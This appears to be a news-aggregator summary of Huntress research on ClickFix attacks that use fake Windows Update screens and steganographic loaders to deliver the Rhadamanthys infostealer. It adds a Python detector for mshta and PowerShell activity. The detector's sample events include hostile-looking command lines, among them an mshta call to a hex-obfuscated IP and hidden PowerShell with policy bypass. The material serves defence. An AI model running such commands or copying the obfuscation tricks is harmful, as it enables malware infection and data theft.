Do Not Download These Windows Security Updates, Experts Warn
From Sept 29 to Oct 30, 76 incidents involved Rhadamanthys infostealer delivered via fake update screens using steganographic loaders, Huntress analysts reported.
- As of November 19, Huntress security analysts Ben Folland and Anna Pham reported a fresh wave of ClickFix attacks using fake Windows Update screens to load Rhadamanthys infostealer across the United States, EMEA and APJ, with multiple active Windows Update lure domains still hosting the campaign.
- Earlier this month, researchers noted the ClickFix technique shifted from robot-check lures to fake Windows Update prompts, with Huntress analyzing activity before and after the November 13 takedowns.
- The attack chain begins with an mshta.exe command using a URL with a hex-encoded second octet, running PowerShell that loads a .NET assembly and a steganographic loader extracting Donut-packed shellcode from PNG pixel data to evade signature-based detection.
- Huntress recommended blocking the Windows Run box, training users that real updates never require pasted commands, using endpoint detection and response tools to monitor suspicious processes, and watching traffic to and from IP 141.98.80.175; Microsoft said ClickFix is now the most common initial access method.
- Amid uncertain attribution, Huntress notes Russian-language comments on the lure site and a hex-encoded URL structure linked to Rhadamanthys; these techniques surged over the past year among government-sponsored spies and cybercriminal gangs.
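As an added example (not code from Huntress or any of the articles summarized here), a small Python detector over constructed process-creation events: it flags mshta.exe launched with a URL whose host hides an octet in hex, normalizes the host back to dotted decimal so ordinary indicator matching still works, and flags PowerShell started as a child of mshta.exe. The field names and the 203.x.x.x sample address are constructed, not indicators from the campaign.

```python
import re
from typing import Optional

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta http://203.0x71.10.5/v1/"},  # hex second octet (0x71 = 113)
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe", "cmdline": "powershell -w hidden -ep bypass -c ..."},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta C:\\Program Files\\Vendor\\installer.hta"},  # local HTA, benign here
]

# Dotted host where each octet is decimal or 0x-prefixed hex: URL parsers accept this,
# but a blocklist entry written as plain dotted decimal will not match it textually.
HOST_RE = re.compile(r"https?://((?:(?:0x[0-9a-f]+|\d{1,3})\.){3}(?:0x[0-9a-f]+|\d{1,3}))", re.I)

def normalize_host(host: str) -> Optional[str]:
    """Return the dotted-decimal form of a mixed hex/decimal IPv4 host, or None if invalid."""
    octets = []
    for part in host.split("."):
        value = int(part, 16) if part.lower().startswith("0x") else int(part)
        if not 0 <= value <= 255:
            return None
        octets.append(str(value))
    return ".".join(octets)

def hex_octet_url_host(cmdline: str) -> Optional[str]:
    """Normalized host if the command line carries a URL with at least one hex octet."""
    m = HOST_RE.search(cmdline)
    if not m or "0x" not in m.group(1).lower():
        return None
    return normalize_host(m.group(1))

def classify(event: dict) -> Optional[str]:
    """Verdict string for one event, or None when nothing in this ruleset fires."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    if image == "mshta.exe":
        host = hex_octet_url_host(event["cmdline"])
        if host:
            return f"mshta remote HTA with obfuscated IP host {host}"
    if image in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":
        return "powershell spawned by mshta.exe"
    return None

def scan(events: list) -> list:
    """(index, verdict) pairs for every event that matched a rule."""
    return [(i, v) for i, e in enumerate(events) if (v := classify(e))]
```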
15 Articles
New ClickFix attacks use fake Windows Update screens to fool employees
CSOs and Windows admins should disable the ability of personal computers to automatically run commands to block the latest version of the ClickFix social engineering attacks. This advice comes from researchers at Huntress, who this week warned that a new version of ClickFix-based attacks, where employees are tricked into running malicious commands, is circulating. The latest tactics of this campaign include steganography — hiding malware in the …
ClickFix Returns: Stealthy Malware Hidden in PNGs Targets Windows Users
New variants use full-screen browser lures, steganography, and shellcode loaders to drop LummaC2 and Rhadamanthys malware. A New…
Fraudsters are trying clever, sophisticated methods to get hold of your data: right now, they are sending dangerous code to your computer in a way that you can unsuspectingly consent to.
While Windows is rolling out its patches, a malicious campaign exploits the surrounding confusion to display a fake system update installation screen and encourage users to run a booby-trapped command themselves. The payoff: a nasty infection courtesy of Rhadamanthys.